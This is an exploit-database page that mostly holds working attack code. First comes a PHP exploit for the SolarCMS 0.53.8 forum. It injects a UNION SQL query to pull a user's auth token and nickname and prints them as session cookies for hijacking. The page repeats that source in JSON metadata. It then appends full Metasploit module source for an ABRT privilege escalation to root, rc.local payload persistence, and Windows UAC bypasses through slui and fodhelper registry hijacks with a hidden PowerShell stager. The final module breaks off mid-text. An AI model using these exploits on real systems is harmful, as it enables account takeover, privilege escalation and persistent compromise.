Search...

SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit

2008-12-22T00:00:00

ID 1337DAY-ID-4523
Type zdt
Reporter StAkeR
Modified 2008-12-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit
=========================================================


&lt;?php

error_reporting(0);

/***************************************************************
 *  ---------------------------------------------------------  * 
 *  SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit  *
 *  ---------------------------------------------------------  *
 *  download on http://cms.maury91.org/                        *
 *  works regardless PHP.ini settings                          *                     
 *  ---------------------------------------------------------  *
 ***************************************************************/


list($file,$host,$path,$myid,$table) = $argv;

if($argc != 5) usage();

$cookie = (preg_match('/\^(.+?)\^/',get_cookies(),$out)) ? explode(':',$out[1]) : error();

if($path == '/')
{
      print "_nick={$cookie[1]}; path=/;\n";
      print "_sauth={$cookie[0]}; path=/;\n";
      exit;
}     
else
{
      print "/{$path}_nick={$cookie[1]}; path=/;\n";
      print "/{$path}_sauth={$cookie[0]}; path=/;\n";
      exit;
}      
 
 
 

function get_cookies()
{
      global $host,$path,$myid,$table;
       
      $data .= "GET {$path}/index.php?com=Forum&cat=-1+union+select+1,";
      $data .= "concat(0x5e,sauth,0x3a,nick,0x5e),3+from+{$table}+where+id={$myid}-- HTTP/1.1\r\n";
      $data .= "Host: {$host}\r\n";
      $data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
      $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
      $data .= "Connection: close\r\n\r\n";

      
      
      if(!$sock = fsockopen($host,80)) die("connection refused\n");
      
      fputs($sock,$data);
      
      while(!feof($sock))
      {
            $html .= fgets($sock);
      }    
      
      fclose($sock);
      return $html;
}     


       
function error()
{
      print "Exploit Failed!\n";
      print "Regards ;)\n";
      exit;
}

function usage()
{
      print "---------------------------------------------------------\n";    
      print "SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit\n";
      print "---------------------------------------------------------\n";
      print "Usage: php xpl.php [host] [path] [userid] [table]\n";
      print "php xpl.php localhost /  1 solarcms_users\n";
      exit;

}



#  0day.today [2018-03-06]  #

JSON Vulners Source

Initial Source

{"hash": "3261c44ca2dac19072749b9d8edcfd6086753f63375321c53a8a75d80465f7d2", "id": "1337DAY-ID-4523", "lastseen": "2018-03-06T21:06:47", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "70e68573b6b46c6c95b1f6c6eb22aa0d", "key": "href"}, {"hash": "16268abf5ba0db14694c1ee3fe053fb4", "key": "modified"}, {"hash": "16268abf5ba0db14694c1ee3fe053fb4", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e2bf4418b9caf97eac2562e25de15c28", "key": "reporter"}, {"hash": "57a0b1565abfbe7884d50f78fea70324", "key": "sourceData"}, {"hash": "df5f8cd6161229687f8c67eaa56d7888", "key": "sourceHref"}, {"hash": "c297771ab9c6e77ffc576153ee577edd", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-03-06T21:06:47"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:34334"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:4523", "SECURITYVULNS:DOC:4523"]}], "modified": "2018-03-06T21:06:47"}, "vulnersScore": 0.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/4523", "description": "Exploit for unknown platform in category web applications", "title": "SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit", "history": [{"bulletin": {"hash": "7eb57fa7c73a3b2cc0a4afbc55fe868c4e40fbd07e13ccdb2702fa7f0b8f4f73", "id": "1337DAY-ID-4523", "lastseen": "2016-04-19T01:39:33", "enchantments": {"score": {"value": 6.4, "modified": "2016-04-19T01:39:33"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e2bf4418b9caf97eac2562e25de15c28", "key": "reporter"}, {"hash": "16268abf5ba0db14694c1ee3fe053fb4", "key": "published"}, {"hash": "16268abf5ba0db14694c1ee3fe053fb4", "key": "modified"}, {"hash": "c297771ab9c6e77ffc576153ee577edd", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "803feb065ca43bba82c7da6f7828aed9", "key": "sourceHref"}, {"hash": "2f8bca2bb70b36f0e0e9af91fe76bb59", "key": "href"}, {"hash": "e5f7660737cc149bcd3e2c5537a8e62d", "key": "sourceData"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/4523", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "=========================================================\r\nSolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit\r\n=========================================================\r\n\r\n\r\n<?php\r\n\r\nerror_reporting(0);\r\n\r\n/***************************************************************\r\n * --------------------------------------------------------- * \r\n * SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit *\r\n * --------------------------------------------------------- *\r\n * download on http://cms.maury91.org/ *\r\n * works regardless PHP.ini settings * \r\n * --------------------------------------------------------- *\r\n ***************************************************************/\r\n\r\n\r\nlist($file,$host,$path,$myid,$table) = $argv;\r\n\r\nif($argc != 5) usage();\r\n\r\n$cookie = (preg_match('/\\^(.+?)\\^/',get_cookies(),$out)) ? explode(':',$out[1]) : error();\r\n\r\nif($path == '/')\r\n{\r\n print \"_nick={$cookie[1]}; path=/;\\n\";\r\n print \"_sauth={$cookie[0]}; path=/;\\n\";\r\n exit;\r\n} \r\nelse\r\n{\r\n print \"/{$path}_nick={$cookie[1]}; path=/;\\n\";\r\n print \"/{$path}_sauth={$cookie[0]}; path=/;\\n\";\r\n exit;\r\n} \r\n \r\n \r\n \r\n\r\nfunction get_cookies()\r\n{\r\n global $host,$path,$myid,$table;\r\n \r\n $data .= \"GET {$path}/index.php?com=Forum&cat=-1+union+select+1,\";\r\n $data .= \"concat(0x5e,sauth,0x3a,nick,0x5e),3+from+{$table}+where+id={$myid}-- HTTP/1.1\\r\\n\";\r\n $data .= \"Host: {$host}\\r\\n\";\r\n $data .= \"User-Agent: Mozilla/4.5 [en] (Win95; U)\\r\\n\";\r\n $data .= \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\";\r\n $data .= \"Connection: close\\r\\n\\r\\n\";\r\n\r\n \r\n \r\n if(!$sock = fsockopen($host,80)) die(\"connection refused\\n\");\r\n \r\n fputs($sock,$data);\r\n \r\n while(!feof($sock))\r\n {\r\n $html .= fgets($sock);\r\n } \r\n \r\n fclose($sock);\r\n return $html;\r\n} \r\n\r\n\r\n \r\nfunction error()\r\n{\r\n print \"Exploit Failed!\\n\";\r\n print \"Regards ;)\\n\";\r\n exit;\r\n}\r\n\r\nfunction usage()\r\n{\r\n print \"---------------------------------------------------------\\n\"; \r\n print \"SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit\\n\";\r\n print \"---------------------------------------------------------\\n\";\r\n print \"Usage: php xpl.php [host] [path] [userid] [table]\\n\";\r\n print \"php xpl.php localhost / 1 solarcms_users\\n\";\r\n exit;\r\n\r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2008-12-22T00:00:00", "references": [], "reporter": "StAkeR", "modified": "2008-12-22T00:00:00", "href": "http://0day.today/exploit/description/4523"}, "lastseen": "2016-04-19T01:39:33", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "=========================================================\r\nSolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit\r\n=========================================================\r\n\r\n\r\n<?php\r\n\r\nerror_reporting(0);\r\n\r\n/***************************************************************\r\n * --------------------------------------------------------- * \r\n * SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit *\r\n * --------------------------------------------------------- *\r\n * download on http://cms.maury91.org/ *\r\n * works regardless PHP.ini settings * \r\n * --------------------------------------------------------- *\r\n ***************************************************************/\r\n\r\n\r\nlist($file,$host,$path,$myid,$table) = $argv;\r\n\r\nif($argc != 5) usage();\r\n\r\n$cookie = (preg_match('/\\^(.+?)\\^/',get_cookies(),$out)) ? explode(':',$out[1]) : error();\r\n\r\nif($path == '/')\r\n{\r\n print \"_nick={$cookie[1]}; path=/;\\n\";\r\n print \"_sauth={$cookie[0]}; path=/;\\n\";\r\n exit;\r\n} \r\nelse\r\n{\r\n print \"/{$path}_nick={$cookie[1]}; path=/;\\n\";\r\n print \"/{$path}_sauth={$cookie[0]}; path=/;\\n\";\r\n exit;\r\n} \r\n \r\n \r\n \r\n\r\nfunction get_cookies()\r\n{\r\n global $host,$path,$myid,$table;\r\n \r\n $data .= \"GET {$path}/index.php?com=Forum&cat=-1+union+select+1,\";\r\n $data .= \"concat(0x5e,sauth,0x3a,nick,0x5e),3+from+{$table}+where+id={$myid}-- HTTP/1.1\\r\\n\";\r\n $data .= \"Host: {$host}\\r\\n\";\r\n $data .= \"User-Agent: Mozilla/4.5 [en] (Win95; U)\\r\\n\";\r\n $data .= \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\";\r\n $data .= \"Connection: close\\r\\n\\r\\n\";\r\n\r\n \r\n \r\n if(!$sock = fsockopen($host,80)) die(\"connection refused\\n\");\r\n \r\n fputs($sock,$data);\r\n \r\n while(!feof($sock))\r\n {\r\n $html .= fgets($sock);\r\n } \r\n \r\n fclose($sock);\r\n return $html;\r\n} \r\n\r\n\r\n \r\nfunction error()\r\n{\r\n print \"Exploit Failed!\\n\";\r\n print \"Regards ;)\\n\";\r\n exit;\r\n}\r\n\r\nfunction usage()\r\n{\r\n print \"---------------------------------------------------------\\n\"; \r\n print \"SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit\\n\";\r\n print \"---------------------------------------------------------\\n\";\r\n print \"Usage: php xpl.php [host] [path] [userid] [table]\\n\";\r\n print \"php xpl.php localhost / 1 solarcms_users\\n\";\r\n exit;\r\n\r\n}\r\n\r\n\r\n\n# 0day.today [2018-03-06] #", "published": "2008-12-22T00:00:00", "references": [], "reporter": "StAkeR", "modified": "2008-12-22T00:00:00", "href": "https://0day.today/exploit/description/4523"}

{"metasploit": [{"lastseen": "2019-11-23T06:31:54", "bulletinFamily": "exploit", "description": "This module attempts to gain root privileges on RHEL systems with a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured as the crash handler. `sosreport` uses an insecure temporary directory, allowing local users to write to arbitrary files (CVE-2015-5287). This module uses a symlink attack on `/var/tmp/abrt/cc-*$pid/` to overwrite the `modprobe` path in `/proc/sys/kernel/modprobe`, resulting in root privileges. Waiting for `sosreport` could take a few minutes. This module has been tested successfully on: abrt 2.1.11-12.el7 on RHEL 7.0 x86_64; and abrt 2.1.11-19.el7 on RHEL 7.1 x86_64.\n", "modified": "2019-05-29T18:24:53", "published": "2019-04-20T11:48:52", "id": "MSF:EXPLOIT/LINUX/LOCAL/ABRT_SOSREPORT_PRIV_ESC", "href": "", "type": "metasploit", "title": "ABRT sosreport Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ABRT sosreport Privilege Escalation',\n 'Description' => %q{\n This module attempts to gain root privileges on RHEL systems with\n a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured\n as the crash handler.\n\n `sosreport` uses an insecure temporary directory, allowing local users\n to write to arbitrary files (CVE-2015-5287). This module uses a symlink\n attack on `/var/tmp/abrt/cc-*$pid/` to overwrite the `modprobe` path\n in `/proc/sys/kernel/modprobe`, resulting in root privileges.\n\n Waiting for `sosreport` could take a few minutes.\n\n This module has been tested successfully on:\n\n abrt 2.1.11-12.el7 on RHEL 7.0 x86_64; and\n abrt 2.1.11-19.el7 on RHEL 7.1 x86_64.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'rebel', # Discovery and sosreport-rhel7.py exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2015-11-23',\n 'Platform' => ['linux'],\n 'Arch' =>\n [\n ARCH_X86,\n ARCH_X64,\n ARCH_ARMLE,\n ARCH_AARCH64,\n ARCH_PPC,\n ARCH_MIPSLE,\n ARCH_MIPSBE\n ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [[ 'Auto', {} ]],\n 'References' =>\n [\n ['BID', '78137'],\n ['CVE', '2015-5287'],\n ['EDB', '38832'],\n ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/01/1'],\n ['URL', 'https://access.redhat.com/errata/RHSA-2015:2505'],\n ['URL', 'https://access.redhat.com/security/cve/CVE-2015-5287'],\n ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1266837']\n ]\n ))\n register_options [\n OptInt.new('TIMEOUT', [true, 'Timeout for sosreport (seconds)', '600'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def base_dir\n datastore['WritableDir']\n end\n\n def timeout\n datastore['TIMEOUT']\n end\n\n def check\n kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'\n unless kernel_core_pattern.include? 'abrt-hook-ccpp'\n vprint_error 'System is not configured to use ABRT for crash reporting'\n return CheckCode::Safe\n end\n vprint_good 'System is configured to use ABRT for crash reporting'\n\n if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'\n vprint_error 'abrt-ccp service not running'\n return CheckCode::Safe\n end\n vprint_good 'abrt-ccpp service is running'\n\n # Patched in 2.1.11-35.el7\n pkg_info = cmd_exec('yum list installed abrt | grep abrt').to_s\n abrt_version = pkg_info[/^abrt.*$/].to_s.split(/\\s+/)[1]\n if abrt_version.blank?\n vprint_status 'Could not retrieve ABRT package version'\n return CheckCode::Safe\n end\n unless Gem::Version.new(abrt_version) < Gem::Version.new('2.1.11-35.el7')\n vprint_status \"ABRT package version #{abrt_version} is not vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"ABRT package version #{abrt_version} is vulnerable\"\n\n unless command_exists? 'python'\n vprint_error 'python is not installed'\n return CheckCode::Safe\n end\n vprint_good 'python is installed'\n\n CheckCode::Appears\n end\n\n def upload_and_chmodx(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n chmod path\n register_file_for_cleanup path\n end\n\n def exploit\n unless check == CheckCode::Appears\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n exe_data = ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2015-5287', 'sosreport-rhel7.py')\n exe_name = \".#{rand_text_alphanumeric 5..10}\"\n exe_path = \"#{base_dir}/#{exe_name}\"\n upload_and_chmodx exe_path, exe_data\n\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n register_file_for_cleanup '/tmp/hax.sh'\n\n print_status \"Launching exploit - This might take a few minutes (Timeout: #{timeout}s) ...\"\n output = cmd_exec \"echo \\\"#{payload_path}& exit\\\" | #{exe_path}\", nil, timeout\n output.each_line { |line| vprint_status line.chomp }\n end\nend\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/abrt_sosreport_priv_esc.rb"}, {"lastseen": "2019-10-23T22:50:07", "bulletinFamily": "exploit", "description": "This module will edit /etc/rc.local in order to persist a payload. The payload will be executed on the next reboot.\n", "modified": "2018-11-04T05:28:32", "published": "2018-07-16T07:34:03", "id": "MSF:EXPLOIT/LINUX/LOCAL/RC_LOCAL_PERSISTENCE", "href": "", "type": "metasploit", "title": "rc.local Persistence", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Unix\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'rc.local Persistence',\n 'Description' => %q(\n This module will edit /etc/rc.local in order to persist a payload.\n The payload will be executed on the next reboot.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Eliott Teissonniere' ],\n 'Platform' => [ 'unix', 'linux' ],\n 'Arch' => ARCH_CMD,\n 'Payload' => {\n 'BadChars' => \"#%\\n\",\n 'Compat' => {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic python ruby netcat perl'\n }\n },\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },\n 'DisclosureDate' => 'Oct 01 1980', # The rc command appeared in 4.0BSD.\n 'Targets' => [ ['Automatic', {}] ],\n 'DefaultTarget' => 0\n ))\n end\n\n def exploit\n rc_path = '/etc/rc.local'\n\n unless writable? rc_path\n fail_with Failure::BadConfig, \"#{rc_path} is not writable\"\n end\n\n print_status \"Reading #{rc_path}\"\n\n # read /etc/rc.local, but remove `exit 0`\n rc_local = read_file(rc_path).gsub(/^exit.*$/, '')\n\n # add payload and put back `exit 0`\n rc_local << \"\\n#{payload.encoded}\\nexit 0\\n\"\n\n # write new file\n print_status \"Patching #{rc_path}\"\n write_file(rc_path, rc_local)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/rc_local_persistence.rb"}, {"lastseen": "2019-12-04T08:44:40", "bulletinFamily": "exploit", "description": "This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under the Current User hive, and inserting a custom command that will get invoked when any binary (.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking. When we run slui.exe with changed Registry key (HKCU:\\Software\\Classes\\exefile\\shell\\open\\command), it will run our custom command as Admin instead of slui.exe. The module modifies the registry in order for this exploit to work. The modification is reverted once the exploitation attempt has finished. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting the payload in a different process.\n", "modified": "2019-09-08T04:42:21", "published": "2018-03-28T18:44:16", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/BYPASSUAC_SLUIHIJACK", "href": "", "type": "metasploit", "title": "Windows UAC Protection Bypass (Via Slui File Handler Hijack)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/exe'\nrequire 'msf/core/exploit/powershell'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Exploit::Powershell\n include Post::Windows::Priv\n include Post::Windows::Registry\n include Post::Windows::Runas\n\n SLUI_DEL_KEY = \"HKCU\\\\Software\\\\Classes\\\\exefile\".freeze\n SLUI_WRITE_KEY = \"HKCU\\\\Software\\\\Classes\\\\exefile\\\\shell\\\\open\\\\command\".freeze\n EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze\n EXEC_REG_VAL = ''.freeze # This maps to \"(Default)\"\n EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze\n SLUI_PATH = \"%WINDIR%\\\\System32\\\\slui.exe\".freeze\n CMD_MAX_LEN = 16383\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Windows UAC Protection Bypass (Via Slui File Handler Hijack)',\n 'Description' => %q{\n This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under\n the Current User hive, and inserting a custom command that will get invoked when any binary\n (.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable\n to file handler hijacking. When we run slui.exe with changed Registry key\n (HKCU:\\Software\\Classes\\exefile\\shell\\open\\command), it will run our custom command as Admin\n instead of slui.exe.\n\n The module modifies the registry in order for this exploit to work. The modification is\n reverted once the exploitation attempt has finished.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting the\n payload in a different process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'bytecode-77', # UAC bypass discovery and research\n 'gushmazuko', # MSF & PowerShell module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Targets' => [\n ['Windows x86', { 'Arch' => ARCH_X86 }],\n ['Windows x64', { 'Arch' => ARCH_X64 }]\n ],\n 'DefaultTarget' => 0,\n 'References' =>\n [\n ['URL', 'https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation'],\n ['URL', 'https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1']\n ],\n 'DisclosureDate' => 'Jan 15 2018'\n )\n )\n end\n\n def check\n if sysinfo['OS'] =~ /Windows (8|10)/ && is_uac_enabled?\n CheckCode::Appears\n else\n CheckCode::Safe\n end\n end\n\n def exploit\n # Validate that we can actually do things before we bother\n # doing any more work\n check_permissions!\n\n commspec = 'powershell'\n registry_view = REGISTRY_VIEW_NATIVE\n psh_path = \"%WINDIR%\\\\System32\\\\WindowsPowershell\\\\v1.0\\\\powershell.exe\"\n\n # Make sure we have a sane payload configuration\n if sysinfo['Architecture'] == ARCH_X64\n if session.arch == ARCH_X86\n # On x64, check arch\n commspec = '%WINDIR%\\\\Sysnative\\\\cmd.exe /c powershell'\n if target_arch.first == ARCH_X64\n # We can't use absolute path here as\n # %WINDIR%\\\\System32 is always converted into %WINDIR%\\\\SysWOW64 from a x86 session\n psh_path = \"powershell.exe\"\n end\n end\n if target_arch.first == ARCH_X86\n # Invoking x86, so switch to SysWOW64\n psh_path = \"%WINDIR%\\\\SysWOW64\\\\WindowsPowershell\\\\v1.0\\\\powershell.exe\"\n end\n else\n # if we're on x86, we can't handle x64 payloads\n if target_arch.first == ARCH_X64\n fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')\n end\n end\n\n if !payload.arch.empty? && (payload.arch.first != target_arch.first)\n fail_with(Failure::BadConfig, 'payload and target should use the same architecture')\n end\n\n case get_uac_level\n when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,\n UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,\n UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT\n fail_with(Failure::NotVulnerable,\n \"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...\")\n when UAC_DEFAULT\n print_good('UAC is set to Default')\n print_good('BypassUAC can bypass this setting, continuing...')\n when UAC_NO_PROMPT\n print_warning('UAC set to DoNotPrompt - using ShellExecute \"runas\" method instead')\n shell_execute_exe\n return\n end\n\n payload_value = rand_text_alpha(8)\n psh_path = expand_path(psh_path)\n\n template_path = Rex::Powershell::Templates::TEMPLATE_DIR\n psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)\n\n if psh_payload.length > CMD_MAX_LEN\n fail_with(Failure::None, \"Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})\")\n end\n\n psh_stager = \"\\\"IEX (Get-ItemProperty -Path #{SLUI_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\\\"\"\n cmd = \"#{psh_path} -nop -w hidden -c #{psh_stager}\"\n\n existing = registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, registry_view) || \"\"\n exist_delegate = !registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?\n\n if existing.empty?\n registry_createkey(SLUI_WRITE_KEY, registry_view)\n end\n\n print_status(\"Configuring payload and stager registry keys ...\")\n unless exist_delegate\n registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)\n end\n\n registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)\n registry_setvaldata(SLUI_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)\n\n # Calling slui.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.\n cmd_path = expand_path(commspec)\n cmd_args = expand_path(\"Start-Process #{SLUI_PATH} -Verb runas\")\n print_status(\"Executing payload: #{cmd_path} #{cmd_args}\")\n\n # We can't use cmd_exec here because it blocks, waiting for a result.\n client.sys.process.execute(cmd_path, cmd_args, 'Hidden' => true)\n\n # Wait a copule of seconds to give the payload a chance to fire before cleaning up\n # TODO: fix this up to use something smarter than a timeout?\n sleep(3)\n\n handler(client)\n\n print_status(\"Cleaning up ...\")\n unless exist_delegate\n registry_deleteval(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)\n end\n if existing.empty?\n registry_deletekey(SLUI_DEL_KEY, registry_view)\n else\n registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)\n end\n registry_deleteval(SLUI_WRITE_KEY, payload_value, registry_view)\n end\n\n def check_permissions!\n unless check == Exploit::CheckCode::Appears\n fail_with(Failure::NotVulnerable, \"Target is not vulnerable.\")\n end\n fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?\n # Check if you are an admin\n # is_in_admin_group can be nil, true, or false\n print_status('UAC is Enabled, checking level...')\n vprint_status('Checking admin status...')\n admin_group = is_in_admin_group?\n if admin_group.nil?\n print_error('Either whoami is not there or failed to execute')\n print_error('Continuing under assumption you already checked...')\n else\n if admin_group\n print_good('Part of Administrators group! Continuing...')\n else\n fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')\n end\n end\n\n if get_integrity_level == INTEGRITY_LEVEL_SID[:low]\n fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/bypassuac_sluihijack.rb"}, {"lastseen": "2019-12-03T16:57:33", "bulletinFamily": "exploit", "description": "This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.\n", "modified": "2019-09-08T04:42:21", "published": "2017-05-22T16:25:17", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/BYPASSUAC_FODHELPER", "href": "", "type": "metasploit", "title": "Windows UAC Protection Bypass (Via FodHelper Registry Key)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/exe'\nrequire 'msf/core/exploit/powershell'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Exploit::Powershell\n include Post::Windows::Priv\n include Post::Windows::Registry\n include Post::Windows::Runas\n\n FODHELPER_DEL_KEY = \"HKCU\\\\Software\\\\Classes\\\\ms-settings\".freeze\n FODHELPER_WRITE_KEY = \"HKCU\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command\".freeze\n EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze\n EXEC_REG_VAL = ''.freeze # This maps to \"(Default)\"\n EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze\n FODHELPER_PATH = \"%WINDIR%\\\\System32\\\\fodhelper.exe\".freeze\n CMD_MAX_LEN = 16383\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)',\n 'Description' => %q{\n This module will bypass Windows 10 UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting 